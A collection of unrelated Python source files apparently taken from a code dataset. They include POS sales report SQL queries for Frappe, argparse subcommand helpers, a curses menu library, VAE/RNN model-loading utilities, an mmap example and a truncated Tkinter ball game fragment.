self.append("item_groups", row)
def _get_clauses(args):
clauses = concatv(
[
"si.docstatus = 1",
"si.is_pos = 1",
"si.pos_profile = %(pos_profile)s",
"si.company = %(company)s",
"TIMESTAMP(si.posting_date, si.posting_time) BETWEEN %(period_from)s AND %(period_to)s", # noqa
],
["si.owner = %(user)s"] if args.get("user") else [],
)
return " AND ".join(clauses)
def _get_invoices(args):
sales = frappe.db.sql(
"""
SELECT
si.name AS name,
si.pos_total_qty AS pos_total_qty,
si.base_grand_total AS grand_total,
si.base_net_total AS net_total,
si.base_discount_amount AS discount_amount,
si.outstanding_amount AS outstanding_amount,
si.paid_amount AS paid_amount,
si.change_amount AS change_amount,
si.pb_sales_employee,
si.pb_sales_employee_name
FROM `tabSales Invoice` AS si
WHERE {clauses} AND is_return != 1
""".format(
clauses=_get_clauses(args)
),
values=args,
as_dict=1,
)
returns = frappe.db.sql(
"""
SELECT
si.name AS name,
si.pos_total_qty AS pos_total_qty,
si.base_grand_total AS grand_total,
si.base_net_total AS net_total,
si.base_discount_amount AS discount_amount,
si.paid_amount AS paid_amount,
si.change_amount AS change_amount,
si.pb_sales_employee,
si.pb_sales_employee_name
FROM `tabSales Invoice` As si
WHERE {clauses} AND is_return = 1
""".format(
clauses=_get_clauses(args)
),
values=args,
as_dict=1,
)
return sales, returns
def _get_payments(args):
sales_payments = frappe.db.sql(
"""
SELECT
sip.mode_of_payment AS mode_of_payment,
sip.type AS type,
SUM(sip.base_amount) AS amount,
sip.mop_currency AS mop_currency,
SUM(sip.mop_amount) AS mop_amount
FROM `tabSales Invoice Payment` AS sip
LEFT JOIN `tabSales Invoice` AS si ON
sip.parent = si.name
WHERE sip.parenttype = 'Sales Invoice' AND {clauses}
GROUP BY sip.mode_of_payment
""".format(
clauses=_get_clauses(args)
),
values=args,
as_dict=1,
)
default_mop = compose(
excepts(StopIteration, first, lambda __: None),
partial(pluck, "mode_of_payment"),
frappe.get_all,
)(
"Sales Invoice Payment",
fields=["mode_of_payment"],
filters={
"parenttype": "POS Profile",
"parent": args.get("pos_profile"),
"default": 1,
},
)
collection_payments = frappe.db.sql(
"""
SELECT
mode_of_payment,
SUM(paid_amount) AS amount
FROM `tabPayment Entry`
WHERE docstatus = 1
AND company = %(company)s
AND owner = %(user)s
AND payment_type = "Receive"
AND TIMESTAMP(posting_date, pb_posting_time) BETWEEN %(period_from)s AND %(period_to)s
GROUP BY mode_of_payment
""",
values=args,
as_dict=1,
)
return (
_correct_mop_amounts(sales_payments, default_mop),
_correct_mop_amounts(collection_payments, default_mop),
)
def _correct_mop_amounts(payments, default_mop):
"""
Correct conversion_rate for MOPs using base currency.
Required because conversion_rate is calculated as
base_amount / mop_amount
for MOPs using alternate currencies.
"""
base_mops = compose(list, partial(pluck, "name"), frappe.get_all)(
"Mode of Payment", filters={"in_alt_currency": 0}
)
base_currency = frappe.defaults.get_global_default("currency")
def correct(payment):
return frappe._dict(
merge(
payment,
{"is_default": 1 if payment.mode_of_payment == default_mop else 0},
{"mop_amount": payment.base_amount, "mop_currency": base_currency}
if payment.mode_of_payment in base_mops
else {},
)
)
return [correct(x) for x in payments]
def _get_taxes(args):
taxes = frappe.db.sql(
"""
SELECT
stc.rate AS rate,
SUM(stc.base_tax_amount_after_discount_amount) AS tax_amount
FROM `tabSales Taxes and Charges` AS stc
LEFT JOIN `tabSales Invoice` AS si ON
stc.parent = si.name
WHERE stc.parenttype = 'Sales Invoice' AND {clauses}
GROUP BY stc.rate
""".format(
clauses=_get_clauses(args)
),
values=args,
as_dict=1,
)
return taxes
def _get_item_groups(args):
def get_tax_rate(item_tax_rate):
try:
tax_rates = json.loads(item_tax_rate)
return sum([v for k, v in tax_rates.items()])
except TypeError:
0
def set_tax_and_total(row):
tax_amount = (
get_tax_rate(row.get("item_tax_rate")) * row.get("net_amount") / 100
)
return merge(
row,
{
"tax_amount": tax_amount,
"grand_total": tax_amount + row.get("net_amount"),
},
)
groups = reduceby(
"item_group",
lambda a, x: {
"qty": a.get("qty") + x.get("qty"),
"net_amount": a.get("net_amount") + x.get("net_amount"),
"tax_amount": a.get("tax_amount") + x.get("tax_amount"),
"grand_total": a.get("grand_total") + x.get("grand_total"),
},
(
set_tax_and_total(x)
for x in frappe.db.sql(
"""
SELECT
sii.item_code,
sii.item_group,
sii.qty,
sii.net_amount,
sii.item_tax_rate
FROM `tabSales Invoice Item` AS sii
LEFT JOIN `tabSales Invoice` AS si ON
si.name = sii.parent
WHERE {clauses}
""".format(
clauses=_get_clauses(args)
),
values=args,
as_dict=1,
)
),
{"qty": 0, "net_amount": 0, "tax_amount": 0, "grand_total": 0},
)
return [merge(v, {"item_group": k}) for k, v in groups.items()]
| StarcoderdataPython |
9746649 | <reponame>nick-youngblut/StrainGE
# Copyright (c) 2016-2019, Broad Institute, Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name Broad Institute, Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
import sys
import textwrap
import argparse
from abc import ABCMeta, abstractmethod
class Subcommand(metaclass=ABCMeta):
"""Represents a subcommand with its own argument parser arguments."""
def register_arguments(self, subparser: argparse.ArgumentParser):
"""This function should register all required arguments for this
subcommand."""
@abstractmethod
def __call__(self, *args, **kwargs):
"""When the subcommand is used on the command line, this function
will be called."""
class SubcommandRegistry:
def __init__(self, version=None, subcommands_title="", *args, **kwargs):
self.parser = argparse.ArgumentParser(*args, **kwargs)
self.parser.set_defaults(subcommand_func=None)
self.subparsers = self.parser.add_subparsers(
title=subcommands_title if subcommands_title else "Subcommands")
if version:
self.parser.add_argument(
'--version', action='version', version=version)
def register_subcommand(self, name: str, subcommand: Subcommand, **kwargs):
# Use subcommand class level documentation also for documentation on
# command line -h/--help
if hasattr(subcommand.__class__, '__doc__'):
subcommand_doc = subcommand.__class__.__doc__
first_help_line = subcommand_doc.strip().split('\n\n')[0].strip()
kwargs['help'] = first_help_line
kwargs['description'] = textwrap.dedent(subcommand_doc)
kwargs['formatter_class'] = argparse.RawDescriptionHelpFormatter
subparser = self.subparsers.add_parser(name, **kwargs)
# Initialize subcommand arguments
subcommand.register_arguments(subparser)
subparser.set_defaults(subcommand_func=subcommand)
def run(self, parser_args: argparse.Namespace):
args_dict = vars(parser_args)
subcommand_func = args_dict.pop('subcommand_func')
if subcommand_func:
rc = subcommand_func(**args_dict)
else:
self.parser.print_help()
rc = 1
if rc is None:
rc = 0
sys.exit(rc)
| StarcoderdataPython |
3438398 | <reponame>flexiooss/flexio-flow
from __future__ import annotations
from typing import Optional, Type
import abc
from VersionControlProvider.Issue import Issue
from VersionControlProvider.KeyWordsDialect import KeyWordsDialect
class IssueMessage(abc.ABC):
def __init__(self, message: str, issue: Optional[Type[Issue]] = None):
self.message: str = message
self.issue: Optional[Type[Issue]] = issue
@staticmethod
@abc.abstractmethod
def keywords_dialect() -> Type[KeyWordsDialect]:
pass
def with_close(self) -> str:
if self.issue is not None:
return """{message!s}
{close_keyword!s} {issue_ref!s}""".format(
message=self.message,
close_keyword=self.keywords_dialect().close(),
issue_ref=self.issue.get_ref()
)
else:
return self.message
def with_ref(self) -> str:
if self.issue is not None:
return """{message!s}
{ref_keyword!s} {issue_ref!s}""".format(
message=self.message,
ref_keyword=self.keywords_dialect().ref(),
issue_ref=self.issue.get_ref()
)
else:
return self.message
| StarcoderdataPython |
321540 | <reponame>ch1huizong/learning
#!/usr/bin/env python
#
# Copyright 2007 <NAME>.
#
"""Writing to a memory mapped file using a slice assignment.
"""
__version__ = "$Id$"
#end_pymotw_header
import mmap
import shutil
import contextlib
# Copy the example file
shutil.copyfile('lorem.txt', 'lorem_copy.txt')
word = 'consectetuer'
reversed = word[::-1]
print 'Looking for :', word
print 'Replacing with :', reversed
with open('lorem_copy.txt', 'r+') as f:
with contextlib.closing(mmap.mmap(f.fileno(), 0)) as m:
print 'Before:'
print m.readline().rstrip()
m.seek(0) # rewind
loc = m.find(word)
m[loc:loc+len(word)] = reversed
m.flush()
m.seek(0) # rewind
print 'After :'
print m.readline().rstrip()
f.seek(0) # rewind
print 'File :'
print f.readline().rstrip()
| StarcoderdataPython |
1619340 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import router_func as rfunc
import router_pass as rpass
rfunc.hoge
| StarcoderdataPython |
1809036 | <gh_stars>0
from django.apps import AppConfig
class HerdConfig(AppConfig):
default_auto_field = "django.db.models.BigAutoField"
name = "herd"
| StarcoderdataPython |
9624970 | import logging
import os
from typing import Tuple, Union
import h5py
import torch
from PIL import Image
from torchvision import transforms
from models import select_vae_model, select_rnn_model, Controller
from models.vae import BaseVAE
from utils.setup_utils import load_yaml_config
from utils.constants import (
GUI_ENV_INITIAL_STATE_FILE_PATH, INITIAL_OBS_LATENT_VECTOR_FILE_NAME, MAX_COORDINATE
)
def vae_transformation_functions(img_size: int, dataset: str, output_activation_function: str):
if dataset == "gui_env_image_dataset_500k_normalize":
mean, std = get_dataset_mean_std(dataset)
transformation_functions = transforms.Compose([
transforms.Resize((img_size, img_size)),
transforms.ToTensor(),
transforms.Normalize(mean, std)
])
return transformation_functions
if output_activation_function == "sigmoid":
transformation_functions = transforms.Compose([
transforms.Resize((img_size, img_size)),
transforms.ToTensor()
])
elif output_activation_function == "tanh":
transformation_functions = transforms.Compose([
transforms.Resize((img_size, img_size)),
transforms.ToTensor(), # Transforms images to [0, 1] range
transforms.Lambda(lambda x: 2.0 * x - 1.0) # Transforms tensors to [-1, 1] range
])
else:
raise RuntimeError(f"Output activation function {output_activation_function} unknown")
return transformation_functions
def get_rnn_action_transformation_function(max_coordinate_size_for_task: int, reduce_action_coordinate_space_by: int,
action_transformation_function_type: str):
if reduce_action_coordinate_space_by > 0:
already_reduced_factor = MAX_COORDINATE // max_coordinate_size_for_task
assert isinstance(already_reduced_factor, int), ("For simplicity used_max_coordinate_size must be a multiple "
f"of MAX_COORDINATE (which is {MAX_COORDINATE})")
reduce_factor = reduce_action_coordinate_space_by / already_reduced_factor
# -1.0 because coordinates start at 0
new_max_coordinate = (max_coordinate_size_for_task / reduce_factor) - 1.0
rnn_action_transformation_functions = [
transforms.Lambda(lambda x: torch.div(x, reduce_factor, rounding_mode="floor"))
]
else:
rnn_action_transformation_functions = []
new_max_coordinate = max_coordinate_size_for_task - 1.0
if action_transformation_function_type == "tanh":
rnn_action_transformation_functions.append(
transforms.Lambda(lambda x: ((2.0 * x) / new_max_coordinate) - 1.0)
)
return transforms.Compose(rnn_action_transformation_functions)
def get_rnn_reward_transformation_function(reward_output_mode: str, reward_output_activation_function: str):
"""
Reward output mode mse: -> Use [0, 1] or [-1, 1] range depending on output activation function
Reward output mode bce: -> Only use discrete 0 or 1 reward
"""
if reward_output_mode == "mse":
if reward_output_activation_function == "sigmoid":
# Rewards are already in [0, 1] range coming from data generation
rewards_transformation_function = None
elif reward_output_activation_function == "tanh":
rewards_transformation_function = transforms.Lambda(lambda x: 2.0 * x - 1.0)
else:
raise RuntimeError(f"Reward output activation function '{reward_output_activation_function}' unknown")
elif reward_output_mode == "bce":
# Convert rewards > 0 to 1 and rewards equal to 0 remain 0
rewards_transformation_function = transforms.Lambda(lambda x: x.greater(0).float())
else:
raise RuntimeError(f"Reward output mode '{reward_output_mode}' unknown")
return rewards_transformation_function
def get_dataset_mean_std(dataset: str):
if dataset == "gui_env_image_dataset_500k_normalize":
return [0.9338, 0.9313, 0.9288], [0.1275, 0.1329, 0.141]
else:
return None, None
def save_checkpoint(state: dict, is_best: bool, checkpoint_filename: str, best_filename: str):
torch.save(state, checkpoint_filename)
if is_best:
torch.save(state, best_filename)
def load_architecture(model_type: str, model_dir: str, device, load_best: bool = True, load_optimizer: bool = False,
rnn_batch_size=None, vae_directory=None):
config = load_yaml_config(os.path.join(model_dir, "config.yaml"))
model_name = config["model_parameters"]["name"]
if model_type == "vae":
model_class = select_vae_model(model_name)
model = model_class(config["model_parameters"]).to(device)
elif model_type == "rnn":
if rnn_batch_size is None:
rnn_batch_size = config["experiment_parameters"]["batch_size"]
vae_config = load_yaml_config(os.path.join(vae_directory, "config.yaml"))
latent_size = vae_config["model_parameters"]["latent_size"]
model_class = select_rnn_model(model_name)
model = model_class(config["model_parameters"], latent_size, rnn_batch_size, device).to(device)
else:
raise RuntimeError(f"Model type {model_type} unknown")
if load_best:
state_dict_file_name = "best.pt"
else:
state_dict_file_name = "checkpoint.pt"
checkpoint = torch.load(os.path.join(model_dir, state_dict_file_name), map_location=device)
model.load_state_dict(checkpoint["state_dict"])
if load_optimizer:
return model, model_name, checkpoint["optimizer"]
return model, model_name
def load_vae_architecture(vae_directory: str, device: torch.device, load_best: bool = True,
load_optimizer: bool = False) -> Union[Tuple[BaseVAE, str], Tuple[BaseVAE, str, dict]]:
return load_architecture(
"vae",
model_dir=vae_directory,
device=device,
load_best=load_best,
load_optimizer=load_optimizer
)
def load_rnn_architecture(rnn_directory: str, vae_directory: str, device: torch.device, batch_size=None,
load_best: bool = True,
load_optimizer: bool = False) -> Union[Tuple[BaseVAE, str], Tuple[BaseVAE, str, dict]]:
return load_architecture(
"rnn",
model_dir=rnn_directory,
device=device,
load_best=load_best,
load_optimizer=load_optimizer,
rnn_batch_size=batch_size,
vae_directory=vae_directory
)
def construct_controller(rnn_dir: str, vae_dir: str):
rnn_config = load_yaml_config(os.path.join(rnn_dir, "config.yaml"))
vae_config = load_yaml_config(os.path.join(vae_dir, "config.yaml"))
latent_size = vae_config["model_parameters"]["latent_size"]
hidden_size = rnn_config["model_parameters"]["hidden_size"]
action_size = rnn_config["model_parameters"]["action_size"]
controller = Controller(latent_size, hidden_size, action_size)
return controller
def load_controller_parameters(controller, controller_directory: str, device: torch.device):
state = torch.load(os.path.join(controller_directory, "best.pt"), map_location=device)
# Take minus of the reward because when saving we "convert" it back to the normal way of summing up the fitness
# For training we however take the negative amount as the CMA-ES implementation minimizes the fitness instead
# of maximizing it
current_best = -state["reward"]
controller.load_state_dict(state["state_dict"])
return controller, current_best
def generate_initial_observation_latent_vector(vae_dir, device, load_best: bool = True):
initial_obs_path = os.path.join(vae_dir, INITIAL_OBS_LATENT_VECTOR_FILE_NAME)
if os.path.exists(initial_obs_path):
logging.info("Initial observation in latent space already calculated, continuing")
return initial_obs_path
vae, _ = load_vae_architecture(vae_dir, device, load_best=load_best, load_optimizer=False)
vae.eval()
vae_config = load_yaml_config(os.path.join(vae_dir, "config.yaml"))
img_size = vae_config["experiment_parameters"]["img_size"]
dataset = vae_config["experiment_parameters"]["dataset"]
output_activation_function = vae_config["model_parameters"]["output_activation_function"]
transformation_functions = vae_transformation_functions(img_size=img_size, dataset=dataset,
output_activation_function=output_activation_function)
img = Image.open(GUI_ENV_INITIAL_STATE_FILE_PATH)
img = transformation_functions(img)
img = img.unsqueeze(0).to(device) # Simulate batch dimension
with torch.no_grad():
mu, log_var = vae.encode(img)
with h5py.File(initial_obs_path, "w") as f:
f.create_dataset(f"mu", data=mu.cpu())
f.create_dataset(f"log_var", data=log_var.cpu())
# Explicitly delete vae to free memory from gpu
del vae
torch.cuda.empty_cache()
logging.info("Calculated and stored the initial observation in latent space")
return initial_obs_path
| StarcoderdataPython |
4980572 | <filename>mc_manager/curses_helpers.py
import curses
from curses.textpad import Textbox, rectangle
class item_base():
"""The base class for menu items
"""
def init_curses(self):
"""A few curses settings shared across all items
"""
curses.noecho()
curses.cbreak()
curses.curs_set(0)
def display(self, y_pos, key_x, value_x, stdscr, selected, formatting=0):
"""This is meant to be overloaded by a child
"""
pass
class item_title(item_base):
"""class for a centered menu item
"""
def __init__(self, title, on_change=None):
self.title = title
self.max_len = 0
self.name = title
def display(self, y_pos, stdscr, selected, formatting=0):
self.init_curses()
cols = stdscr.getmaxyx()[1]
window = curses.newwin(1,len(self.title)+1,y_pos,int((cols/2)-len(self.title)/2))
padding = curses.newwin(1,cols,y_pos,0)
padding.erase()
padding.addstr(" "*(cols-1))
padding.refresh()
window.erase()
window.addstr(0,0,self.title, formatting)
window.refresh()
del window
del padding
if selected:
return self.title
return None
class item_editor(item_base):
"""class for a menu item with a key and editable value
"""
def __init__(self, key, value, max_val_len=20):
"""This is a display item which has a key and an editable value
Args:
key (str): The key to be displayed
value (str,int,float,bool): The value to be edited
max_val_len (int, optional): The maximum length of the value field.
Defaults to 20.
"""
self.key=key
self.value=value
self.name = key
if type(value) is str:
self.validation = self.str_validator
elif type(value) is int:
self.validation = self.int_validator
elif type(value) is float:
self.validation = self.float_validator
self.max_val_len = max_val_len
def display(self, y_pos, key_x, value_x, stdscr, selected, formatting=0):
"""Displays the item
Args:
y_pos (int): The y position on stdscr for the item to be displayed
key_x (int): the x position on stdscr for the key to be displayed
value_x (int): the x position on stdscr for the value to be displayed
stdscr (_CursesWindow): a curses windows or pad to use
selected (bool): Whether or not this item is selected
formatting (int, optional): a curses format to use. Defaults to 0.
Returns:
None, value: returns self.value if an edit was made, otherwise None
"""
self.init_curses()
key_window=curses.newwin(1,value_x-key_x,y_pos,key_x)
value_window=curses.newwin(1,self.max_val_len,y_pos,value_x)
changed=False
if selected:
if type(self.value) is bool:
self.bool_validator(stdscr,value_window)
else:
curses.curs_set(1)
self.box = Textbox(value_window)
self.box.edit(self.validation)
self.box=None
changed=True
key_window.erase()
key_window.addstr(0,0,self.key, formatting)
value_window.erase()
value_window.addstr(str(self.value), formatting)
key_window.refresh()
value_window.refresh()
del key_window
del value_window
return (self.key,self.value) if changed else None
def str_validator(self, key):
"""This function maps a given keystroke to the desired response when
the user is editing a value of type str
Args:
key (int): The key pressed
Returns:
int: the key to returns
"""
if self.box == None:
return
if key == 27:
return curses.ascii.BEL
elif key == curses.KEY_BACKSPACE or key == 127:
return 8
elif key == curses.KEY_ENTER or key == 10 or key == 13:
self.value=self.box.gather().strip()
return curses.ascii.BEL
else:
return key
def float_validator(self, key):
"""This function maps a given keystroke to the desired response when
the user is editing a value of type float
Args:
key (int): The key pressed
Returns:
int: the key to returns
"""
if self.box == None:
return
if key == 27:
return curses.ascii.BEL
elif key == curses.KEY_BACKSPACE or key == 127:
return 8
elif key == curses.KEY_ENTER or key == 10 or key == 13:
self.value=float(self.box.gather().strip())
return curses.ascii.BEL
elif key == 46:
gather = self.box.gather()
# If dot hasn't been used and the string isn't empty
if (not '.' in gather) and (gather.strip()):
return key
if key in range(48,58): # allowed values
return key
def int_validator(self, key):
"""This function maps a given keystroke to the desired response when
the user is editing a value of type int
Args:
key (int): The key pressed
Returns:
int: the key to returns
"""
if self.box == None:
return
if key == 27:
return curses.ascii.BEL
elif key == curses.KEY_BACKSPACE or key == 127:
return 8
elif key == curses.KEY_ENTER or key == 10 or key == 13:
in_val = self.box.gather().strip()
if in_val != "":
self.value=int(in_val)
return curses.ascii.BEL
if key in range(48,58): # allowed values
return key
def bool_validator(self, stdscr, window): # This one's special and runs without textbox
"""This function gets a keystroke and toggles self.value, exiting without
changing on ESC and exiting with changes on ENTER
Args:
stdscr (_CursesWindow): The parent screen object
window (_CursesWindow): The window object text is being written to
Returns:
int: the key to returns
"""
value = self.value
while True:
key = stdscr.getch()
if key == 27:
return value
elif key in [curses.KEY_UP, curses.KEY_DOWN,
curses.KEY_LEFT, curses.KEY_RIGHT, 32]: # 32 is space
value = not value
window.erase()
window.addstr(str(value), curses.A_STANDOUT)
window.refresh()
elif key == curses.KEY_ENTER or key == 10 or key == 13:
self.value = value
return value
class list_base():
"""base class for lists of items
"""
def __init__(self, items):
self.items = items
self.selected = 0
self.returnVal = None
def display(self, stdscr):
"""Displays a list of items
Args:
stdscr (_CursesWindow): The window object to display to
Returns:
any: returns whatever the child class sets self.returnVal to
"""
self.rows, self.cols = stdscr.getmaxyx()
self.middle_col = int(self.cols/2)
self.start = 0
stdscr.erase()
stdscr.refresh()
self.pre_loop(stdscr)
while True:
self.rows, self.cols = stdscr.getmaxyx()
if not self.loop(stdscr):
break
if not self.get_key(stdscr):
break
self.post_loop(stdscr)
return self.returnVal
def pre_loop(self, stdscr):
"""This is run before the main loop, and is available to be overloaded
Args:
stdscr (_CursesWindow): The window object to display to
"""
pass
def loop(self, stdscr):
"""This is the main loop, and is meant to be overloaded
Args:
stdscr (_CursesWindow): The window object to display to
Returns:
bool: True to continue loop, false otherwise
"""
return True
def post_loop(self, stdscr):
"""This is run after the loop completes and is available to be overloaded
Args:
stdscr (_CursesWindow): The window object to display to
"""
pass
def get_key(self, stdscr):
"""This function handles commonly used keys,
and calls overloadable functions to deal with them
Args:
stdscr (_CursesWindow): The window object to display to
Returns:
bool: True to continue the main loop, False to stop
"""
key = stdscr.getch()
if key == curses.KEY_DOWN:
return self.key_down()
elif key == curses.KEY_UP:
return self.key_up()
if key in [curses.KEY_ENTER, 10, 13]:
return self.key_enter()
elif key == 27:
return False
else:
return True
def key_enter(self):
"""This is a function called when enter is pressed
it is available to be overloaded
Returns:
bool: True to continue the main loop, False to stop
"""
return True
def key_up(self):
"""This is a function called when the up key is pressed
it is available to be overloaded, but calls sel_up() by default
Returns:
bool: True to continue the main loop, False to stop
"""
return self.sel_up()
def key_down(self):
"""This is a function called when the down key is pressed
it is available to be overloaded, but calls sel_down() by default
Returns:
bool: True to continue the main loop, False to stop
"""
return self.sel_down()
def sel_up(self):
"""This function is called to move the cursor up
"""
if self.selected == self.start:
if self.start > 0:
self.start -= 1
self.selected -= 1
else:
self.selected = len(self.items)-1
self.start = max(0,len(self.items)-self.rows)
else:
self.selected -= 1
return True
def sel_down(self):
"""This function is called to move the cursor down
"""
if self.selected + 1 >= self.rows + self.start or self.selected >= len(self.items) - 1:
if ((self.start + self.rows < len(self.items)) and (self.selected < len(self.items))):
self.start += 1
self.selected += 1
else:
self.selected = 0
self.start = 0
else:
self.selected += 1
return True
class list_editor(list_base):
"""class for a list of item_editor items
"""
def __init__(self, items):
"""Calls parent init and also finds the
largest sized string in the list of items given
Args:
items (list): a list of items which share the item_base parent
to be displayed in the list
"""
super().__init__(items)
self.keylength = (
max(
map(
len,
(
(x.key if type(x) is item_editor else "" for x in self.items)
)
)
)
)
self.edit = False
return
def pre_loop(self, stdscr):
"""Sets up the variable returnVal to be used as a list
Args:
stdscr (_CursesWindow): The window object to display to
"""
self.returnVal = []
return
def loop(self, stdscr):
"""This is the function called in the loop
inside the parent's display() function
Args:
stdscr (_CursesWindow): The window object to display to
Returns:
bool: true to continue the loop, false to stop it
"""
for i in range(len(self.items)):
if i >= self.start and i <= self.start + self.rows:
if type(self.items[i]) is item_editor:
setting = self.items[i].display(
(i-self.start),
(self.middle_col-(self.keylength+2)),
(self.middle_col+2),
(stdscr),
(i==self.selected and self.edit),
(curses.A_STANDOUT if i==self.selected else 0))
elif type(self.items[i]) is item_title:
self.items[i].display(
(i-self.start),
(stdscr),
(False),
(curses.A_STANDOUT if i==self.selected else 0))
else:
setting = None
if type(setting) is tuple:
self.returnVal.append(setting) # if changed, append new setting
self.edit = False
return True
def key_enter(self):
"""This is the function called when enter is pressed
Returns:
bool: true to continue the loop
"""
self.edit = True
return True
# TODO: Replace with new list_h function using items
class select_h():
def __init__(self, items, title=""):
self.items = items
self.title = title
def display(self, stdscr):
curses.noecho()
curses.cbreak()
curses.curs_set(0)
selected=0
while True:
rows, cols = stdscr.getmaxyx()
middle_column = int(cols / 2)
middle_row = int(rows / 2)
half_length_of_message = int(len(self.title) / 2)
x_position = middle_column - half_length_of_message
stdscr.erase()
stdscr.addstr(0, x_position, self.title+"\n", curses.A_BOLD)
for i in range(len(self.items)):
# Get centered position
half_length_of_message = int(len(" ".join(self.items)) / 2)
y_position = middle_row
x_position = middle_column - half_length_of_message
# Print
if selected == i:
stdscr.addstr(y_position, x_position +
(sum(map(len,self.items[0:i])))+i, self.items[i], curses.A_STANDOUT)
else:
stdscr.addstr(y_position, x_position +
(sum(map(len,self.items[0:i])))+i, self.items[i])
stdscr.refresh()
key = stdscr.getch()
if key == curses.KEY_RIGHT:
selected = (selected + 1)%len(self.items)
elif key == curses.KEY_LEFT:
selected = (selected - 1)%len(self.items)
elif key == curses.KEY_ENTER or key == 10 or key == 13:
return self.items[selected]
elif key == 27: # escape
return None
# TODO: Replace with new list_menu function using items
class select_v():
def __init__(self, items, title=""):
self.items = items
self.title = title
def display(self, stdscr):
curses.noecho()
curses.cbreak()
curses.curs_set(0)
selected=0
while True:
rows, cols = stdscr.getmaxyx()
middle_row = int(rows / 2)
middle_column = int(cols / 2)
top_row = int(middle_row-(len(self.items)/2))
half_length_of_message = int(len(self.title) / 2)
x_position = middle_column - half_length_of_message
stdscr.erase()
stdscr.addstr(0, x_position, self.title+"\n", curses.A_BOLD)
for i in range(len(self.items)):
# Get centered position
half_length_of_message = int(len(self.items[i]) / 2)
y_position = top_row
x_position = middle_column - half_length_of_message
# Print
if selected == i:
stdscr.addstr(y_position+i, x_position, self.items[i], curses.A_STANDOUT)
else:
stdscr.addstr(y_position+i, x_position, self.items[i])
stdscr.refresh()
key = stdscr.getch()
if key == curses.KEY_DOWN:
selected = (selected + 1)%len(self.items)
elif key == curses.KEY_UP:
selected = (selected - 1)%len(self.items)
elif key == curses.KEY_ENTER or key == 10 or key == 13:
return self.items[selected]
elif key == 27: # escape
return None
# TODO: Replace with new list_menu function using items
class select_v_scrolling():
def __init__(self, items, title=""):
self.items = items
self.title = title
def display(self, stdscr):
rows, cols = stdscr.getmaxyx()
curses.noecho()
curses.cbreak()
curses.curs_set(0)
self._selected = 0
self._window = [0, min(rows - 2,len(self.items))]
while True:
rows, cols = stdscr.getmaxyx()
middle_column = int(cols / 2)
half_length_of_message = int(len(self.title) / 2)
x_position = middle_column - half_length_of_message
stdscr.erase()
stdscr.addstr(0, x_position, self.title+"\n", curses.A_BOLD)
for i in range(self._window[0], self._window[1]):
# Get centered position
half_length_of_message = int(len(self.items[i]) / 2)
y_position = stdscr.getyx()[0]
x_position = middle_column - half_length_of_message
# Print
if self._selected == i:
stdscr.addstr(y_position, x_position,self.items[i]+"\n", curses.A_STANDOUT)
else:
stdscr.addstr(y_position, x_position,self.items[i]+"\n")
stdscr.refresh()
key = stdscr.getch()
keydict = {
curses.KEY_DOWN:self.key_down,
curses.KEY_UP:self.key_up
}
if key in keydict:
keydict[key]()
elif key in [curses.KEY_ENTER, 10, 13]:
return self.items[self._selected]
elif key == 27: # escape
return None
def key_up(self):
if self._window[0] == self._selected:
if self._window[0] > 1:
self._window[0] -= 1
self._window[1] -= 1
self._selected -= 1
else:
self._selected -= 1
def key_down(self):
if self._window[1] == self._selected+1:
if self._window[1] < len(self.items):
self._window[0] += 1
self._window[1] += 1
self._selected += 1
else:
self._selected += 1
if __name__ == "__main__":
ed = list_editor([item_editor("one",1),
item_editor("Two","2"),
item_editor("Three",False),
item_editor("Two","2"),
item_editor("Three",False),
item_editor("Two","2"),
item_title("TITLE"),
item_editor("Three",False),
item_editor("Two","2"),
item_editor("Three",False),
item_editor("Two","2"),
item_editor("Three",False),
item_editor("Two","2"),
item_editor("Three",False),
item_editor("Four",True)])
curses.wrapper(ed.display) | StarcoderdataPython |
5155058 | <reponame>sbutalla/vfatqc-python-scripts
from gempython.utils.standardopts import parser
parser.add_option("--mspl", type="int", dest = "MSPL", default = 4,
help="Specify MSPL. Must be in the range 1-8 (default is 4)", metavar="MSPL")
parser.add_option("--nevts", type="int", dest="nevts",
help="Number of events to count at each scan point", metavar="nevts", default=1000)
parser.add_option("--scanmin", type="int", dest="scanmin",
help="Minimum value of scan parameter", metavar="scanmin", default=0)
parser.add_option("--scanmax", type="int", dest="scanmax",
help="Maximum value of scan parameter", metavar="scanmax", default=254)
parser.add_option("--vfatmask", type="int", dest="vfatmask",
help="VFATs to be masked in scan & analysis applications (e.g. 0xFFFFF masks all VFATs)", metavar="vfatmask", default=0x0)
parser.add_option("--ztrim", type="float", dest="ztrim", default=4.0,
help="Specify the p value of the trim", metavar="ztrim") | StarcoderdataPython |
12801362 | <gh_stars>0
#!/usr/bin/env python3
# coding:utf-8
# 改进小红球
class Ball:
def __init__(self, canvas, paddle, color):
self.canvas = canvas
self.paddle = paddle
self.id = canvas.create_oval(10, 10, 25, 25, fill=color)
self.canvas.move(self.id, 245, 100)
starts = [-3, -2, -1, 1, 2, 3]
random.shuffle(starts) # 打乱 starts
self.x = starts[0]
self.y = -3
self.canvas_height = self.canvas.winfo_height() # 获取高度坐标
self.canvas_width = self.canvas.winfo_width() # 获取宽度坐标
def draw(self):
